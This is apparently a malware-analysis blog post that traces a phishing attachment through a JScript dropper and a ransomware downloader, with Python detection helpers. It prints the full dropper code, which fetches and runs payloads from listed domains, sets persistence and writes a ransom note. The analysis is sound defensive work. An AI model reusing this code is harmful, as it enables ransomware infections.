2017/03/15

Something Phishy – 03-15-2017 – (Part 1)

by Destruct_Icon
Categories: Analysis, Coding, JavaScript

Hurrah! Destruct_Icon back with another Something Phishy. This one was a feisty little fella, so I’m going to break it up into two parts. Part 1 covers the e-mail, the first stage and some of the second stage, while Part 2 will look at the rest of the second stage, the malware itself and a list of the indicators.

I received an e-mail in which all of the headers point back to izoox as the origin. Looking up the domain (fabfobco[.]com) on domaintools, the nameserver also points back to izoox, and the last update to the domain record was almost a year ago. Checking the source IP (198.58.119[.]30) against mxtoolbox shows that it is on a few blacklists and has had a few campaigns coming from it. Alright, let’s get to the attachment.

Stage 1: FedEx-Delivery-ID-J0YN3H4S.zip

It looks like there was some JavaScript (JScript, run through WScript) inside that zip:

var x = "bandiloo.com ippa-max.com grandrapidsnonprofits.com suburban-sanitation.com bouncinplay.com".split(" ");
var m = "0000001ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRRrZd48hCr_l7sB6sAb7Z5uT6554nVws79mnCRKG8SmFXA4_p62BrwSY-N5AUDJFvsKgVxYvAKzdHzoj9o8f9y";
for (var i=0; i<x.length; i++)
{
    var e = WScript.CreateObject("M"+"SXML2.XMLHTTP");    
    try
    {
        var ter = '/';
        e.open('GET', 
        "h"+"t"+"tp"+":/"+ter+x[i]+ter+"c"+"o"+"unter/?"+m,
        
        false);
        e.send();

        var r = e.responseText;

        if (r.length > 1000 && r.indexOf(m) > -1)
        {
            var ikagdh = r.split(m).join("a");
            eval(ikagdh);

            break;
        };
    }
    catch(e)
    {
    };
};

We’ve got a little bit of obfuscation in here, but this is a fairly straightforward piece of JS. We’ve got an array of domains that the script runs a check against to pull back what is assumed to be some malwarez. Running a GET against the http://{x}/counter/?{m} address brings back a counter.js file which has some magic inside of it. Before moving forward, one of the things that popped out at me is that there appears to be some manipulation of the data that gets returned from the GET request via the .split and .join. Made a note in my handy-dandy notebook on the left.

Stage 2: counter.js

After opening up the counter.js file, a thought crossed my mind.

This is some definite badness and is heavily obfuscated by what appears to be a bunch of garbled text. Looking at it for a minute reminded me of our notebook, and all of a sudden that garbled text seemed extremely familiar. What initially gave it away was that the first line starts with a v and ends with an r, which led me to believe that everything in the middle should be substituted with an a for the JS to declare a new variable. Looking back at the original JavaScript from the zip, it now makes sense why {r} has r.split(m).join("a") applied: it is doing the substitution, and {m} just happens to be the same string in both files. After performing all of the substitutions, deobfuscating and beautifying the code, this next stage looks like the downloader for what appears to be incoming ransomware.

// Ransom note values: ad is the Bitcoin address (also embedded in the stage-1 marker m), am the amount demanded in BTC.
var ad = "1ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRR";
var am = "0.25917";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
// Second-stage hosts; note that bouncinplay.com also appears in the stage-1 domain list.
var ll = ["stihocom.com", "kanhona.com", "doctors.live", "therapy4healing.com", "bouncinplay.com"];
var ws = WScript.CreateObject("WScript.Shell");
// Everything is dropped under %TEMP%: a.doc, a.txt, a2.exe, a.exe, a.php and php4ts.dll.
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
// First run only (no a.doc yet): write a decoy a.doc of 10129 random bytes and open it, then build the ransom note.
if (!fo.FileExists(fn + ".doc")) {
    var fp = fo.CreateTextFile(fn + ".doc", true);
    for (var i = 0; i < 10129; i++) {
        fp.Write(String.fromCharCode(Math.floor(Math.random() * 64 + 20)));
    };
    fp.Close();
    try {
        ws.Run(fn + ".doc", 1, 0);
    } catch (er) {};
    // Ransom note a.txt; the "decryptor" links reuse the same /counter/?{ad} pattern as the fetches below.
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("ATTENTION!");
    fp.WriteLine("");
    fp.WriteLine("All your documents, photos, databases and other important personal files");
    fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
    fp.WriteLine("To restore your files you have to pay " + am + " BTC (bitcoins).");
    fp.WriteLine("Please follow this manual:");
    fp.WriteLine("");
    fp.WriteLine("1. Create Bitcoin wallet here:");
    fp.WriteLine("");
    fp.WriteLine("      https://blockchain.info/wallet/new");
    fp.WriteLine("");
    fp.WriteLine("2. Buy " + am + " BTC with cash, using search here:");
    fp.WriteLine("");
    fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
    fp.WriteLine("");
    fp.WriteLine("3. Send " + am + " BTC to this Bitcoin address:");
    fp.WriteLine("");
    fp.WriteLine("      " + ad);
    fp.WriteLine("");
    fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
    fp.WriteLine("");
    for (var i = 0; i < ll.length; i++) {
        fp.WriteLine("      http://" + ll[i] + "/counter/?" + ad);
    };
    fp.WriteLine("");
    fp.WriteLine("5. Run decryptor to restore your files.");
    fp.WriteLine("");
    fp.WriteLine("PLEASE REMEMBER:");
    fp.WriteLine("");
    fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
    fp.WriteLine("      - Nobody can help you except us.");
    fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
    fp.WriteLine("      - Your files can be decrypted only after you make payment.");
    fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
    fp.Close();
    // Fetch http://{domain}/counter/?a2 .. a5, remembering in ld the first host that answers with more than 1000 bytes.
    // a2 is saved as a2.exe and run at once; a3 becomes a.exe, a4 php4ts.dll and a5 a.php.
    for (var n = 2; n <= 5; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?a" + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.Open();
                    xa.Type = 1;
                    xa.Write(xo.responseBody);
                    xa.Position = 0;
                    if (xa.Size > 1000) {
                        dn = 1;
                        if (n <= 2) {
                            xa.SaveToFile(fn + n + ".exe", 2);
                            try {
                                ws.Run(fn + n + ".exe", 1, 0);
                            } catch (er) {};
                        } else if (n == 3) {
                            xa.SaveToFile(fn + ".exe", 2);
                        } else if (n == 4) {
                            xa.SaveToFile(pd, 2);
                        } else if (n == 5) {
                            xa.SaveToFile(fn + ".php", 2);
                        }
                    };
                    xa.Close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
    // (two lines here are garbled in the original post; they reassign cs, which already holds a backslash from String.fromCharCode(92))
    // With all three pieces on disk: Run-key persistence pointing at the note, a .crypted extension that opens the note in notepad,
    // copies of the note to the Desktop, then a.exe is launched with a.php as its argument (Run waits for it to finish).
    if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);
        ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
        // Clean-up after a.exe returns: overwrite a.php with 1000 lines of the ransom amount, then delete a.php, a.exe and php4ts.dll.
        var fp = fo.CreateTextFile(fn + ".php", true);
        for (var i = 0; i < 1000; i++) {
            fp.WriteLine(am);
        };
        fp.Close();
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
    };
} else {
    // a.doc already exists (later runs): just reopen the decoy document.
    try {
        ws.Run(fn + ".doc", 1, 0);
    } catch (er) {};
};

Good golly, look at all of that! We’ve got files being pulled down and created, and even some startup reg keys being modified! After a quick pass, reviewing the data provides the following information:

  • Quite a few domains are being used, which I’ll research in Part 2.
  • The script builds out the malware by reaching out to addresses in the following pattern: http://{domain}/counter/?a{2-5}
    1. The files are named based on the for loop where {n} equals 2 through 5.
  • Files are saved as a.doc, a.txt, a2.exe, etc. in the Temp directory (plus a.exe, php4ts.dll and a.php for n = 3, 4 and 5).
  • The script adds a HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value named Crypted that points at the txt ransom note, and registers a .crypted extension whose open command launches notepad.exe on that same note.
  • The script cleans up the malware that gets pulled down (a.php, a.exe and php4ts.dll are deleted after execution).
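Reproducing the stage-1 parse and the split/join deobfuscation described under Stage 2, as an added Python example (not code from the post or from the malware): it extracts the domain list and marker m from the stage-1 script, lists the URLs the dropper polls, applies the dropper's own "longer than 1000 characters and contains m" test, and reverses the substitution. The counter.js stand-in is constructed from the first lines of the cleaned stage-2 script with every letter a replaced by the marker, which is the same transformation the real file had applied.

```python
import re

# Stage-1 dropper excerpt: the domain list and marker string are copied from the post.
STAGE1_JS = (
    'var x = "bandiloo.com ippa-max.com grandrapidsnonprofits.com '
    'suburban-sanitation.com bouncinplay.com".split(" ");\n'
    'var m = "0000001ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRRrZd48hCr_l7sB6sAb7Z5uT6554'
    'nVws79mnCRKG8SmFXA4_p62BrwSY-N5AUDJFvsKgVxYvAKzdHzoj9o8f9y";\n'
)

def extract_stage1(js):
    """Pull the domain array (var x) and the marker string (var m) out of the dropper."""
    domains = re.search(r'var x = "([^"]+)"\.split\(" "\)', js).group(1).split(" ")
    marker = re.search(r'var m = "([^"]+)"', js).group(1)
    return domains, marker

def stage2_urls(domains, marker):
    """The URLs the dropper polls in order: http://{domain}/counter/?{m}."""
    return [f"http://{d}/counter/?{marker}" for d in domains]

def looks_like_stage2(body, marker):
    """The dropper's own acceptance test before eval: over 1000 chars and contains m."""
    return len(body) > 1000 and marker in body

def deobfuscate(body, marker):
    """r.split(m).join("a") in JScript is a global replace of the marker with the letter a."""
    return body.replace(marker, "a")

DOMAINS, MARKER = extract_stage1(STAGE1_JS)

# Constructed stand-in for counter.js: the cleaned head of the stage-2 script with every
# letter "a" swapped for the marker, i.e. the transformation the real file had applied.
CLEAN_HEAD = (
    'var ad = "1ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRR";\n'
    'var am = "0.25917";\n'
    'var ld = 0;\n'
    'var cq = String.fromCharCode(34);\n'
    'var cs = String.fromCharCode(92);\n'
    'var ll = ["stihocom.com", "kanhona.com", "doctors.live"];\n'
)
OBFUSCATED_HEAD = CLEAN_HEAD.replace("a", MARKER)

if __name__ == "__main__":
    for url in stage2_urls(DOMAINS, MARKER):
        print("dropper would poll:", url)
    if looks_like_stage2(OBFUSCATED_HEAD, MARKER):
        print(deobfuscate(OBFUSCATED_HEAD, MARKER))
```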

Let’s take a look at what it looks like pulling the malware down manually.

All the files are coming down by default as .png files but opening these suckers up in a hex editor exposes them for what they truly are!

When I ran a capture, these files were identified as applications as they came across the wire, so you may try searching your network for .png downloads whose MIME type is application/* rather than the standard image/png. Part 2 will have more details about this second stage as well as about the malware. I will also research some of the domains, fill out the indicators in our intelfeed, and provide a quick list in the post for all of your copy-and-paste needs! If there are any questions, please feel free to reach out to me at destruct_icon@malwerewolf.com.
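A detection check for the masquerading described above, as an added Python example (not from the post): it parses a raw HTTP response, sniffs the body's magic bytes the way the hex editor pass does, and flags downloads whose name or Content-Type claims PNG while the bytes are a PE, or that arrive via the /counter/?a{2-5} pattern. The responses are constructed samples; cdn.example.test is a placeholder host.

```python
import re
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
COUNTER_URL = re.compile(r"/counter/\?a[2-5]$")  # stage-2 fetch pattern from the post
def sniff(body):
    """Classify a body by magic bytes, the same check the post does by hand in a hex editor."""
    return ("image/png" if body.startswith(PNG_MAGIC)
            else "application/x-dosexec" if body.startswith(b"MZ")
            else "application/octet-stream")

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def flag_masquerade(url, raw):
    """Return the reasons a download looks like a disguised executable (empty list if clean)."""
    _, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    name_says_png = url.split("?", 1)[0].lower().endswith(".png")
    sniffed = sniff(body)
    reasons = []
    if name_says_png and declared.startswith("application/"):
        reasons.append(f"named .png but served as {declared}")
    if (name_says_png or declared == "image/png") and sniffed != "image/png":
        reasons.append(f"claims PNG but bytes are {sniffed}")
    if COUNTER_URL.search(url) and sniffed == "application/x-dosexec":
        reasons.append("PE executable fetched via the /counter/?a{2-5} pattern")
    return reasons

def build_response(content_type, body):
    """Constructed minimal HTTP response used as sample input (not a real capture)."""
    head = f"HTTP/1.1 200 OK\r\nContent-Type: {content_type}\r\nContent-Length: {len(body)}\r\n\r\n"
    return head.encode() + body

# Constructed samples: a PE body from the post's URL pattern, a PE body named .png, a real PNG.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLES = [
    ("http://stihocom.com/counter/?a2", build_response("application/octet-stream", FAKE_PE)),
    ("http://cdn.example.test/banner.png", build_response("application/octet-stream", FAKE_PE)),
    ("http://cdn.example.test/logo.png", build_response("image/png", PNG_MAGIC + b"\0\0\0\rIHDR")),
]
if __name__ == "__main__":
    for url, raw in SAMPLES:
        print(url, "->", flag_masquerade(url, raw) or "clean")
```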

